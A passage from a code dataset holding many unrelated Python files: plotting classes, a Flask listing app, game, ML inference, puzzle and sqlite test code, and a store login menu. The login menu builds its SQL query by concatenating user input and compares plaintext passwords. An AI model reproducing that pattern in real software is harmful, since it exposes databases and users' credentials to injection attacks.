self.calculate_map = False\n        self.conformation = 180 / np.pi\n        self.translation = 0.\n        self.pbc = np.array([True, True])\n        self.energy_digit = -2\n\n        self.ttl2d = 'Hafnium Dioxide Potential Energy Surface'\n        self.xlim2d = np.array([-np.pi, np.pi])\n        self.ylim2d = np.array([-np.pi, np.pi])\n        self.cmp2d = 'cividis'\n        self.alp2d = 0.5\n        self.xlimGMu = np.array([-np.pi, np.pi])\n        self.ylimGMu = np.array([-np.pi, np.pi])\n        self.cmpGMu = 'cividis'\n        self.lvls2d = np.linspace(-130, -129, 20)\n        self.lvlsGMu = np.linspace(-130, -129, 20)\n        self.cmpGCov = 'plasma'\n        self.lvlsGCov = np.linspace(0, 2, 15)\n        self.energy_range = (-130, -129)\n\n        super().__init__(**kwargs)\n\n\nclass PeriodicModel2Plotter(Plotter):\n    def __init__(self, **kwargs):\n        self.calculate_map = True\n        self.conformation = 180 / np.pi\n        self.translation = 0.\n        self.pbc = np.array([True, True])\n        self.energy_digit = -2\n\n        self.ttl2d = 'Periodic Model 2 Potential Energy Surface'\n        self.xlim2d = np.array([-np.pi, np.pi])\n        self.ylim2d = np.array([-np.pi, np.pi])\n        self.cmp2d = 'cividis'\n        self.alp2d = 0.5\n        self.xlimGMu = np.array([-np.pi, np.pi])\n        self.ylimGMu = np.array([-np.pi, np.pi])\n        self.cmpGMu = 'cividis'\n        self.lvls2d = np.linspace(-130, -129, 20)\n        self.lvlsGMu = np.linspace(-130, -129, 20)\n        self.cmpGCov = 'plasma'\n        self.lvlsGCov = np.linspace(0, 2, 15)\n        self.energy_range = (-130, -129)\n        self.quiver_scale = 100\n\n        super().__init__(**kwargs)\n","repo_name":"schinavro/taps","sub_path":"taps/visualize/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":39750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28251253561","text":"from flask import Flask, render_template, jsonify, request, abort\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import or_, and_\nimport os, re\n\napp = Flask(__name__)\napp.config.from_object(os.environ['APP_SETTINGS'])\ndb = SQLAlchemy(app)\n\nfrom models import *\n\n\n@app.route('/index')\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n\n@app.route('/search', methods=['GET'])\ndef search():\n    term = request.args.get('name', '')\n    houses = House.query.filter(House.name.like(\"%\" + term + \"%\")).all()\n    # houses = House.query.all()\n    return jsonify(houses=[house.serialize for house in houses])\n\n\n@app.route('/update')\ndef update():\n    northEast = request.args.get('ne', '')\n    southWest = request.args.get('sw', '')\n    reg = re.compile(r'^-?\\d+(?:\\.\\d+)?,-?\\d+(?:\\.\\d+)?$')\n    if not (southWest and northEast):\n        abort(400)\n    if not (reg.match(southWest) and reg.match(northEast)):\n        abort(400)\n    northEastLat = northEast.split(',')[0]\n    northEastLong = northEast.split(',')[1]\n    southWestLat = southWest.split(',')[0]\n    southWestLong = southWest.split(',')[1]\n    houses = []\n    if southWestLong <= northEastLong:\n        houses = House.query.filter(and_(and_(House.latitude <= southWestLat, House.latitude <= northEastLat), and_(\n            House.longitude <= southWestLong, House.longitude <= northEastLong))).all()\n    else:\n        houses = House.query.filter(and_(and_(House.latitude <= southWestLat, House.latitude <= northEastLat), or_(\n            House.longitude <= southWestLong, House.longitude <= northEastLong))).all()\n    return jsonify(houses=[house.serialize for house in houses])\n\n\nif __name__ == '__main__':\n    
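# Dev-server use only: 0.0.0.0 listens on all interfaces, so anything beyond\n    # local testing should sit behind a production WSGI server (e.g. gunicorn).\n    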
app.run(host=\"0.0.0.0\")\n","repo_name":"makafanpeter/houselisting","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40308559679","text":"import boto3\n\nclient = boto3.client('ec2')\n\nclient.revoke_security_group_egress(\n GroupId='security_grp_Id',\n IpPermissions=[\n {\n 'FromPort': 80,\n 'IpProtocol': 'tcp',\n 'IpRanges': [\n {\n 'CidrIp': '0.0.0.0/0',\n 'Description': '_existing_description'\n },\n ],\n 'ToPort': 80,\n },\n ],\n)","repo_name":"SethuKarthick/aws_automation_using_boto3_python","sub_path":"remove_outbound_rule.py","file_name":"remove_outbound_rule.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43109578848","text":"import tkinter as interfaz\nfrom tkinter import ttk\n\nraiz = interfaz.Tk()\nraiz.geometry(\"300x300\")\n\nmarco = interfaz.Frame(raiz)\nmarco.pack()\n\ndesplegable = ttk.Combobox(marco)\ndesplegable['values']= ['uno','dos','tres','cuatro','cinco','seis','siete']\ndesplegable.pack()\n\n\n\n\n","repo_name":"jocarsa/python","sub_path":"203-Tkinteravanzado/002-Widgets/001-combobox.py","file_name":"001-combobox.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"37646067797","text":"import pygame\nimport sys\n\nfrom snake_food import SnakeFood\nfrom turnPoint import TurnPoint\nfrom snake import Snake\nfrom pygame.sprite import Group\n\ndef check_events(ai_settings, screen, stats, snakes, snakeHead):\n \"\"\"Respond to keypresses and mouse events\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(ai_settings, screen, event, stats,\n snakes, snakeHead)\n\ndef check_keydown_events(ai_settings, screen, event, stats, snakes, snakeHead):\n \"\"\"Respond to keypress.\"\"\"\n if snakeHead.lock:\n if event.key == pygame.K_RIGHT:\n if not snakeHead.moving_right and not snakeHead.moving_left:\n snakeHead.moving_right = True\n snakeHead.moving_left = snakeHead.moving_down = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 1)\n elif event.key == pygame.K_LEFT:\n if not snakeHead.moving_right and not snakeHead.moving_left:\n snakeHead.moving_left = True\n snakeHead.moving_right = snakeHead.moving_down = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 2)\n elif event.key == pygame.K_DOWN:\n if not snakeHead.moving_down and not snakeHead.moving_up:\n snakeHead.moving_down = True\n snakeHead.moving_right = snakeHead.moving_left = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 3)\n elif event.key == pygame.K_UP:\n if not snakeHead.moving_down and not snakeHead.moving_up:\n snakeHead.moving_up = True\n snakeHead.moving_right = snakeHead.moving_down = snakeHead.moving_left = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 4)\n elif event.key == pygame.K_s:\n snakeHead.moving_down = snakeHead.moving_right = snakeHead.moving_left = \\\n snakeHead.moving_up = False\n elif event.key == pygame.K_q:\n sys.exit()\n\n if not snakeHead.lock:\n if event.key == pygame.K_RIGHT:\n if not snakeHead.moving_right:\n snakeHead.moving_right = True\n snakeHead.moving_left = snakeHead.moving_down = snakeHead.moving_up 
= False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 1)\n elif event.key == pygame.K_LEFT:\n if not snakeHead.moving_left:\n snakeHead.moving_left = True\n snakeHead.moving_right = snakeHead.moving_down = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 2)\n elif event.key == pygame.K_DOWN:\n if not snakeHead.moving_down:\n snakeHead.moving_down = True\n snakeHead.moving_right = snakeHead.moving_left = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 3)\n elif event.key == pygame.K_UP:\n if not snakeHead.moving_up:\n snakeHead.moving_up = True\n snakeHead.moving_right = snakeHead.moving_down = snakeHead.moving_left = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 4)\n elif event.key == pygame.K_s:\n snakeHead.moving_down = snakeHead.moving_right = snakeHead.moving_left = \\\n snakeHead.moving_up = False\n elif event.key == pygame.K_q:\n sys.exit()\n\ndef establish_movePoint(ai_settings, screen, snakeHead, snakes, direction):\n movePointX = snakeHead.center\n movePointY = snakeHead.y\n\n new_turnPoint = TurnPoint(ai_settings, screen, movePointX, movePointY, direction)\n\n for snake in snakes:\n if not snake.head:\n snake.turnPoints.add(new_turnPoint) # Adds only new turn points\n\n\n\n\n\ndef enlarge_snake(ai_settings, screen, stats, snakes, snakeList, food, snakeColor):\n\n snake_body = Snake(ai_settings, screen, stats)\n\n snake_body.color = snakeColor\n\n snake_body.moving_left = snakeList[-1].moving_left\n snake_body.moving_down = snakeList[-1].moving_down\n snake_body.moving_right = snakeList[-1].moving_right\n snake_body.moving_up = snakeList[-1].moving_up\n\n snake_body.y = snakeList[-1].y\n snake_body.center = snakeList[-1].center\n\n for turnPoint in snakeList[-1].turnPoints:\n snake_body.turnPoints.add(turnPoint)\n\n if (snakeList[-1].moving_up):\n snake_body.y += 25\n if snakeList[-1].head:\n snake_body.y += 15\n elif (snakeList[-1].moving_down):\n snake_body.y -= 25\n if snakeList[-1].head:\n snake_body.y -= 15\n elif (snakeList[-1].moving_left):\n snake_body.center += 25\n if snakeList[-1].head:\n snake_body.center += 15\n elif (snakeList[-1].moving_right):\n snake_body.center -= 25\n if snakeList[-1].head:\n snake_body.center -= 15\n\n if(stats.score < 3):\n snake_body.head2 = True\n\n # Add to the group\n snake_body.add(snakes)\n # snakes.add(snake_body) # This doesn't seem to be working\n snakeList.append(snake_body) ## This is working\n snakes.update()\n\n # update_snake(ai_settings, stats, screen, snakes, food)\n\ndef spawn_food(ai_settings, screen, stats, snake, food):\n\n if(len(food) < 2): # So far this works\n snake_food = SnakeFood(ai_settings, screen, stats, snake)\n food.add(snake_food)\n\ndef check_turning_point(ai_settings, screen, snake, food):\n if not snake.head:\n for turnPoint in snake.turnPoints:\n if (snake.center == turnPoint.rect.x and snake.y == turnPoint.rect.y):\n snake.stop()\n snake.center = turnPoint.center\n snake.y = turnPoint.y\n\n snake.moving_left = turnPoint.left\n snake.moving_right = turnPoint.right\n snake.moving_up = turnPoint.up\n snake.moving_down = turnPoint.down\n turnPoint.remove(snake.turnPoints)\n\n\n\ndef check_snake_bottom(screen, stats, snakeHead):\n \"\"\"Check to see if the snake is at the bottom\"\"\"\n screen_rect = screen.get_rect()\n\n if(snakeHead.rect.right >= screen_rect.right or\n snakeHead.rect.left <= 0 or\n snakeHead.rect.y <= 0 or\n snakeHead.rect.y >= snakeHead.ai_settings.screen_height - 20):\n\n 
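# The head left the playable area: end the round and restore the cursor.\n        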
stats.game_active = False\n        pygame.mouse.set_visible(True)\n\n\n\ndef update_snake(ai_settings, stats, screen, snakes, food):\n    for snake in snakes:\n        check_turning_point(ai_settings, screen, snake, food)\n\n\ndef check_snakeHead_food_collisions(ai_settings, stats, sb, screen,\n                                    snakeHead, snakes, snakeBody, food):\n    \"\"\"Check to see if the head of the snake bumped into food\"\"\"\n\n    if pygame.sprite.spritecollideany(snakeHead, food):\n\n        foodPart = pygame.sprite.spritecollideany(snakeHead, food)\n\n        # Remember food part is a food, we have to convert it to a snake part\n        foodPart.remove(food)\n        color = foodPart.color\n\n        enlarge_snake(ai_settings, screen, stats, snakes, snakeBody, food, color)\n\n        stats.score += 1\n        sb.prep_score()\n\n        check_high_score(stats, sb)\n\ndef check_snake_collisions(stats, snakeHead, snakes):\n    snakeBody = snakes.copy()\n\n    for snake in snakes:\n        if snake.head or snake.head2: # The second part of this doesn't work yet\n            snakeBody.remove(snake)\n\n    if pygame.sprite.spritecollideany(snakeHead, snakeBody):\n\n        stats.game_active = False\n        pygame.mouse.set_visible(True)\n\ndef update_screen(ai_settings, screen, sb, snake, food, snakeHead):\n    \"\"\"Update the screen constantly\"\"\"\n\n    # Redraw the screen during each loop. Make sure this is first\n    screen.fill(ai_settings.black)\n\n    # Draw the score\n    sb.show_score()\n\n    if sb.stats.score > 0 and not snakeHead.lock:\n        snakeHead.lock = True\n\n\n    # Draw the snake\n    for snake_piece in snake.sprites():\n        snake_piece.blitme()\n        # if not snake_piece.head:\n        for turnPoint in snake_piece.turnPoints:\n            turnPoint.blitme()\n\n\n    # Draw the snake food\n    for snake_food in food.sprites():\n        snake_food.blitme()\n\n    # Make the most recently drawn screen visible\n    pygame.display.flip() # Really need this for the screen to update\n\n\n\ndef check_high_score(stats, sb):\n    \"\"\"Check high score\"\"\"\n    if stats.score > stats.high_score:\n        stats.high_score = stats.score\n        sb.prep_high_score()","repo_name":"JeaneC/jsnake","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":8669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34935039889","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport multiprocessing\n\nimport albumentations as A\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom cv2 import imread\nfrom geffnet import create_model\nfrom pandas import DataFrame\nfrom pandas import concat\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nfrom tqdm import tqdm\n\n# kernel_type = '9c_b7_1e_640_ext_15ep'\n# enet_type = 'efficientnet-b7'\n\nkernel_type = '9c_b6ns_640_ext_15ep'\nenet_type = 'efficientnet-b6'\n\nimage_size = 640\nuse_amp = False\nbatch_size = 32\nnum_workers = multiprocessing.cpu_count()\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nout_dim = 9\nALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'tif', 'dcm'}\n\nCLASS_NAMES = {0: 'AK',\n               1: 'BCC',\n               2: 'BKL',\n               3: 'DF',\n               4: 'SCC',\n               5: 'VASC',\n               6: 'melanoma',\n               7: 'nevus',\n               8: 'unknown'}\n\nuse_meta = False\nuse_external = '_ext' in kernel_type\nmel_idx = 6\n\ntransforms_val = A.Compose([\n    A.Resize(image_size, image_size),\n    A.Normalize()\n])\n\n\nclass SIIMISICDataset(Dataset):\n    def __init__(self, csv, split, mode, transform=None):\n\n        self.csv = csv.reset_index(drop=True)\n        self.split = split\n        self.mode = mode\n        self.transform = transform\n\n    def 
__len__(self):\n return self.csv.shape[0]\n\n def __getitem__(self, index):\n row = self.csv.iloc[index]\n\n image = imread(row.filepath)\n image = image[:, :, ::-1]\n\n if self.transform is not None:\n res = self.transform(image=image)\n image = res['image'].astype(np.float32)\n else:\n image = image.astype(np.float32)\n\n image = image.transpose(2, 0, 1)\n\n if self.mode == 'test':\n return torch.tensor(image).float()\n else:\n return torch.tensor(image).float(), torch.tensor(self.csv.iloc[index].target).long()\n\n\nclass enetv2(nn.Module):\n \"\"\"Model\"\"\"\n\n def __init__(self, backbone, out_dim, n_meta_features=0, load_pretrained=False):\n super(enetv2, self).__init__()\n self.n_meta_features = n_meta_features\n self.enet = create_model(enet_type.replace('-', '_'), pretrained=load_pretrained)\n self.dropout = nn.Dropout(0.5)\n\n in_ch = self.enet.classifier.in_features\n self.myfc = nn.Linear(in_ch, out_dim)\n self.enet.classifier = nn.Identity()\n\n def extract(self, x):\n x = self.enet(x)\n return x\n\n def forward(self, x, x_meta=None):\n x = self.extract(x).squeeze(-1).squeeze(-1)\n x = self.myfc(self.dropout(x))\n return x\n\n\ndef get_trans(img, I):\n if I >= 4:\n img = img.transpose(2, 3)\n if I % 4 == 0:\n return img\n elif I % 4 == 1:\n return img.flip(2)\n elif I % 4 == 2:\n return img.flip(3)\n elif I % 4 == 3:\n return img.flip(2).flip(3)\n\n\ndef val_epoch(loader, n_test=1, get_output=False, model_list=None):\n \"\"\"Validation Function\"\"\"\n if model_list is None:\n model_list = []\n LOGITS = []\n PROBS = []\n with torch.no_grad():\n for (data) in tqdm(loader):\n if use_meta:\n data, meta = data\n # data, meta, target = data.to(device), meta.to(device), target.to(device)\n # logits = torch.zeros((data.shape[0], out_dim)).to(device)\n # probs = torch.zeros((data.shape[0], out_dim)).to(device)\n # for I in range(n_test):\n # l = model(get_trans(data, I), meta)\n # logits += l\n # probs += l.softmax(1)\n else:\n data = data.to(device)\n logits = torch.zeros((data.shape[0], out_dim)).to(device)\n probs = torch.zeros((data.shape[0], out_dim)).to(device)\n for model in model_list:\n for I in range(n_test):\n l = model(get_trans(data, I))\n logits += l\n probs += l.softmax(1)\n logits /= n_test\n probs /= n_test\n probs /= len(model_list)\n\n LOGITS.append(logits.detach().cpu())\n PROBS.append(probs.detach().cpu())\n\n LOGITS = torch.cat(LOGITS).numpy()\n PROBS = torch.cat(PROBS).numpy()\n if get_output:\n return LOGITS, PROBS\n else:\n return None\n\n\ndef predict_melanoma(image_locs, model_list=None):\n dfs, dfs_split = [], []\n df_val = DataFrame(image_locs, columns=['filepath'])\n\n dataset_valid = SIIMISICDataset(df_val, 'train', mode='test', transform=transforms_val)\n valid_loader = torch.utils.data.DataLoader(dataset_valid, batch_size=batch_size, num_workers=num_workers)\n\n this_LOGITS, this_PROBS = val_epoch(valid_loader, n_test=8, get_output=True, model_list=model_list)\n dfs.append(df_val)\n\n dfs = concat(dfs)\n # dfs['pred'] = np.concatenate([this_PROBS]).squeeze()[:, mel_idx]\n # dfs['pred'] = this_PROBS\n # dfs['logits'] = this_LOGITS\n # print('dfs', dfs)\n return dfs, this_PROBS, this_LOGITS\n\n\ndef ensemble(dfs_split, LOGITS, len=0):\n \"\"\"Doing ensembling\"\"\"\n single_df = None\n preds_long = [0 for i in range(len)]\n for d in dfs_split:\n if single_df is None:\n single_df = d\n for i, d_ in enumerate(d['pred']):\n preds_long[i] += d_\n\n preds_long = [i / len for i in preds_long]\n preds_long = DataFrame(preds_long, columns=['pred'])\n single_df = 
concat([single_df['filepath'], preds_long], axis=1)\n return single_df, np.mean(LOGITS, axis=0)\n","repo_name":"Ramstein/MelanomaClassification","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40506172637","text":"from aoc.util.coordinate import Turtle, TurtleDirection\nfrom aoc.util.inputs import Input\n\n\nclass Y2016D1(object):\n def __init__(self, file_name):\n line = Input(file_name).line()\n\n self.moves = line.split(', ')\n\n def part1(self):\n turtle = Turtle(direction=TurtleDirection.NORTH)\n\n for move in self.moves:\n if move[0] == 'R':\n turtle = turtle.turn_right()\n else:\n turtle = turtle.turn_left()\n\n turtle = turtle.forward(int(move[1:]))\n\n result = abs(turtle.coordinate.x) + abs(turtle.coordinate.y)\n\n print(\"Part 1:\", result)\n\n def part2(self):\n seen = set()\n turtle = Turtle(direction=TurtleDirection.NORTH)\n seen.add(turtle.coordinate)\n\n result = 0\n for move in self.moves:\n if result != 0:\n break\n if move[0] == 'R':\n turtle = turtle.turn_right()\n else:\n turtle = turtle.turn_left()\n\n for _ in range(int(move[1:])):\n turtle = turtle.forward()\n if turtle.coordinate in seen:\n result = abs(turtle.coordinate.x) + abs(turtle.coordinate.y)\n break\n seen.add(turtle.coordinate)\n\n print(\"Part 2:\", result)\n\n\nif __name__ == '__main__':\n code = Y2016D1(\"2016/1.txt\")\n code.part1()\n code.part2()\n","repo_name":"Jnesselr/AdventOfCode","sub_path":"aoc/y2016/d1.py","file_name":"d1.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12856157420","text":"import pytest\nfrom store.sqlite import SqliteStore, ReadError\nfrom utils import parse_title\nfrom random import randint\n\n@pytest.fixture\ndef notes():\n notes = ['Lorem Ipsum\\nLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.',\n 'Section 1.10.32 of \"de Finibus Bonorum et Malorum\", written by Cicero in 45 BC\\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.',\n '1914 translation by H. 
Rackham\\nBut I must explain to you how all this mistaken idea of denouncing pleasure and praising pain was born and I will give you a complete account of the system, and expound the actual teachings of the great explorer of the truth, the master-builder of human happiness.']\n return notes\n\n# Set up a db in memory\n@pytest.fixture\ndef db():\n db = SqliteStore(\":memory:\")\n return db\n\ndef test_add_notes(db, notes):\n for note in notes:\n title, _ = db.add_note(note)\n assert title == parse_title(note)\n\ndef test_empty_query(db, notes):\n data = [db.add_note(note) for note in notes]\n for title, uid in db.query(''):\n assert (title, uid) in data\n\ndef test_nonempty_text_query(db, notes):\n data = [db.add_note(note) for note in notes]\n assert data != None\n for _, uid in data:\n assert db.get_text(uid) != ''\n\ndef test_wrong_id_exception(db, notes):\n for note in notes:\n db.add_note(note)\n with pytest.raises(ReadError):\n db.get_text(randint(1,100000))\n\ndef test_lorem_query(db, notes):\n for note in notes:\n db.add_note(note)\n assert 'Lorem Ipsum' in [title for title, _ in db.query('lorem')]\n","repo_name":"apodda/NotebookPy","sub_path":"test_sqlite.py","file_name":"test_sqlite.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41792420346","text":"# -*- coding: utf-8 -*-\n# __file__ : elasticsearch_01.py\n# __time__ : 2020/7/13 9:40 AM\n\nfrom elasticsearch import Elasticsearch, client\nfrom datetime import datetime\n\n# 启动 elasticsearch 服务端\n# 客户端连接\nes = Elasticsearch(hosts='localhost:8080')\n# es.indices.create(index='index', ignore=400) # 会将该 index 接口的返回值设为索引,不支持 datetime 格式(为了速度)\n# 创建索引\nresp = es.indices.create(\n index=\"index\",\n body={\n \"settings\": {\n \"index\": {\"number_of_shards\": 3, \"number_of_replicas\": 2}\n }\n },\n)\nprint(resp)\n# 索引分区并将 body 存入\nes.index(index='index', id=42, body={\"any\": \"data\", \"timestamp\": datetime.now()})\n# 获取索引中存储的数据\nes.get(index=\"index\", id=42)['_source']\n","repo_name":"zuanzuanshao/ModuleStudy","sub_path":"aioelasticsearch_study/elasticsearch_01.py","file_name":"elasticsearch_01.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37071419058","text":"import aiofiles\nimport json\n\n\nclass FileUtil:\n def __init__(self, file_path, is_json=True):\n self.file_path = file_path\n self.is_json = is_json\n\n # Read data from specified file\n async def read(self):\n async with aiofiles.open(self.file_path, mode='r') as file:\n contents = await file.read()\n\n if self.is_json:\n return json.loads(contents)\n else:\n return contents\n\n # Write data to specified file\n async def write(self, data):\n async with aiofiles.open(self.file_path, mode='w') as file:\n if self.is_json:\n content = json.dumps(data)\n else:\n content = data\n await file.write(content)\n\n return content","repo_name":"nscharrenberg/CompSec","sub_path":"Server/fileutils.py","file_name":"fileutils.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36612308870","text":"import sqlite3\nfrom funcionalidades import *\nfrom funcionarios import *\nfrom produtos import *\n\"\"\" \nO processo e as informações de login deveriam receber os devidos tratamentos criptograficos, para armazenamento seguro no banco de dados. 
Mas para esta tarefa não quis utilizar de bibliotecas que não fossem instaladas por padrão exceto o sqlite3 que é obrigatória para a atividade e que eu tenho certeza absoluta de que o professor possui instalada.\"\"\"\n\n# Conexão com SGDB\nconn = sqlite3.connect(\"Perfumaria.db\")\ncursor = conn.cursor()\n\nprint(\"\"\"===============================================\n=== Sistema de banco de dados da Perfumaria ===\n======= Realize o Login para ter acesso =======\n===============================================\"\"\")\n\nwhile True:\n\n    login = input(\"\\n(000) para sair\\nLogin: \")\n    \n    if login == \"000\":\n        break\n    \n    senha = input(\"Senha: \")\n    \n    try: \n        cursor.execute(\"SELECT senha FROM funcionario WHERE login='\"+login+\"'\")\n        senha_db = cursor.fetchone()\n        conn.close\n        \n        if senha == senha_db[0]:\n            print(\"\\nLogin bem sucedido como:\", login)\n            n = 0\n            \n            while True:\n                esc = input(\"\\n==============================\\nO que deseja usar?\\n(1) Listagens/consultas de estoque\\n(2) Gerência de estoque\\n(3) Gerência de funcionários [apenas admin]\\n(000) Fazer logout\\n\\n>> \")\n                \n                if esc == \"1\":\n                    func()\n                \n                elif esc == \"2\":\n                    produtos()\n                \n                elif (login == \"ADMIN\") and (esc == \"3\"):\n                    funcionarios()\n                \n                elif esc == \"000\":\n                    break\n                \n                else:\n                    print(\"\\n!!!Opção inválida!!!\")\n\n        else:\n            print(\"\\n\\nConjunto login e senha inexistente.\\nContate o admin do sistema para se cadastrar ou confira os dados e tente novamente.\\n\")\n        \n    except: \n        print(\"\\n\\nConjunto login e senha inexistente.\\nContate o admin do sistema para se cadastrar ou confira os dados e tente novamente.\\n\")\n    \n","repo_name":"Tchizus/Sistema-Perfumaria-ABC","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22139554639","text":"#!/usr/bin/python3\n\"\"\" Divide elements of a matrix \"\"\"\n\n\ndef matrix_divided(matrix, div):\n    if type(matrix) is not list:\n        raise TypeError(\"matrix must be a matrix (list of lists)\\\n of integers/floats\")\n    if type(div) is not int and type(div) is not float:\n        raise TypeError(\"div must be a number\")\n    if div == 0:\n        raise ZeroDivisionError(\"division by zero\")\n    if len(matrix) < 1:\n        raise TypeError(\"matrix must be a matrix (list of lists)\\\n of integers/floats\")\n    for i in matrix:\n        if type(i) != list:\n            raise TypeError(\"matrix must be a matrix (list of lists)\\\n of integers/floats\")\n        length = len(matrix[0])\n        if length != len(i):\n            raise TypeError(\"Each row of the matrix must have the same size\")\n        for j in i:\n            if type(j) != int and type(j) != float:\n                raise TypeError(\"matrix must be a matrix (list of lists)\\\n of integers/floats\")\n    return(list(map(lambda i: list(map(\n        lambda j: round(j / div, 2), i)), matrix)))\n","repo_name":"PEDA-ALPHA1/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25807439485","text":"\n# Demyanchuk is learning\nimport scipy as sp\nimport matplotlib.pyplot as plt\n\nPATH = \"/Users/alexeydemyanchuk/Machine_Learning/BuildingMachineLearningSystemsWithPython/\"\n\n# function to find approx error\ndef 
error(f, x, y):\n return sp.sum((f(x)-y)**2)\n\n# data x: hours; y: hits per hour\ndata = sp.genfromtxt(PATH+\"ch01/data/web_traffic.tsv\", delimiter=\"\\t\")\n# create vectors from data\nx = data[:,0]\ny = data[:,1]\n# cleaning data from NaN\nx = x[~sp.isnan(y)]\ny = y[~sp.isnan(y)]\n\ninflection = int(3.5*7*24) # calculate the inflection point in hours\nxa = x[:inflection] # data before the inflection point\nya = y[:inflection]\nxb = x[inflection:] # data after\nyb = y[inflection:]\n\nfa = sp.poly1d(sp.polyfit(xa, ya, 1))\nfb = sp.poly1d(sp.polyfit(xb, yb, 1))\nfa_error = error(fa, xa, ya)\nfb_error = error(fb, xb, yb)\nprint(\"Error inflection=%f\" % (fa_error + fb_error))\n\n# plot the (x,y) points with dots of size 10\nplt.scatter(x, y, s=10)\nplt.title(\"Web traffic over the last month\")\nplt.xlabel(\"Time\")\nplt.ylabel(\"Hits/hour\")\n\nplt.xticks([w*7*24 for w in range(10)],\n ['week %i' % w for w in range(10)])\nplt.autoscale(tight=True)\n# draw a slightly opaque, dashed grid\nplt.grid(True, linestyle='-', color='0.75')\n\n\n\n# add model to plot\nfx = sp.linspace(0,x[-1], 1000) # generate X-values for plotting\nplt.plot(fx, fa(fx), linewidth=4)\nplt.plot(fx, fb(fx),color='blue', linestyle=\"-.\",linewidth=4)\nplt.legend([\"d=%i\" % fa.order,\"d=%i\" % fb.order], loc=\"upper left\")\n\n\nplt.show()\n","repo_name":"ademyanchuk/BuildingMachineLearning","sub_path":"ch01/inflection.py","file_name":"inflection.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72229186153","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time :2021/7/26 12:58\n# @Author :DKJ\n# @File :comment.py\n# @Software :PyCharm\n\n\nfrom requests import RequestException\n\ndef get_page(url,headers,proxy=None):\n try:\n response = requests.get(url, headers=headers,proxies=proxy)\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n print('请求出错')\n return None\n\ndef get_blog_url_list(url ,headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60'}):\n page_text = requests.get(url=url,headers=headers).text\n # print(page_text)\n tree = etree.HTML(page_text)\n li_list = tree.xpath('//a/@href')\n # print(li_list)\n # print(li_list)\n url_list = []\n for old_url in li_list:\n if 'article' in old_url and 'category' not in old_url and url.split('/')[-1] in old_url:\n url_list.append(old_url)\n return url_list\n#\n# def parse_page(url):\n# text = requests.get(url)\n# print(text)\n#\n# # def comment(url,headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60'}):\n#\n#\n#\n# url_list = get_url_list(url)\n# print(len(url_list))\n# for url in url_list:\n# print(url)\nfrom selenium import webdriver\nfrom lxml import etree\nimport time\nfrom selenium.webdriver.chrome.options import Options\nimport requests\nfrom json import loads\nimport random\nheaders = {\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 